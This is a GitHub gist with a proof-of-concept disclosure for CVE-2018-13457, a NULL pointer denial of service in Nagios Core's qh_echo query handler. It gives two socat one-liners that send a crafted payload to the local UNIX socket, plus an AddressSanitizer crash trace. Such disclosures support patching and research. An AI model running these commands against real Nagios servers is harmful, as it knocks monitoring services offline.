Last active
July 11, 2018 15:22
-
-
Save fakhrizulkifli/87cf1c1ad403b4d40a86d90c9c9bf7ab to your computer and use it in GitHub Desktop.
CVE-2018-13457
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Nagios Core qh_echo Denial of Service | |
| # Date: 2018-07-09 | |
| # Exploit Author: Fakhri Zulkifli (@d0lph1n98) | |
| # Vendor Homepage: https://www.nagios.org/ | |
| # Software Link: https://www.nagios.org/downloads/nagios-core/ | |
| # Version: 4.4.1 and earlier | |
| # Tested on: 4.4.1 | |
| # CVE : CVE-2018-13457 | |
| qh_echo in Nagios Core 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attackers to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket. | |
| $ echo -ne "#echo\0" | socat unix-connect:./poc/nagios.qh - | |
| $ echo -ne “@echo\0" | socat unix-connect:./poc/nagios.qh - | |
| #0 0x4cb18b in __interceptor_strcmp.part.60 /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:422 | |
| #1 0x554e98 in qh_echo /home/user/nagioscore/base/query-handler.c:29:7 | |
| #2 0x5543db in qh_input /home/user/nagioscore/base/query-handler.c:227:12 | |
| #3 0x6fac51 in iobroker_poll /home/user/nagioscore/lib/iobroker.c:353:4 | |
| #4 0x5bc334 in event_execution_loop /home/user/nagioscore/base/events.c:1136:12 | |
| #5 0x53a503 in main /home/user/nagioscore/base/nagios.c:844:4 | |
| #6 0x7f183c5f782f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 | |
| #7 0x42b278 in _start (/home/user/nagioscore/base/nagios+0x42b278) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment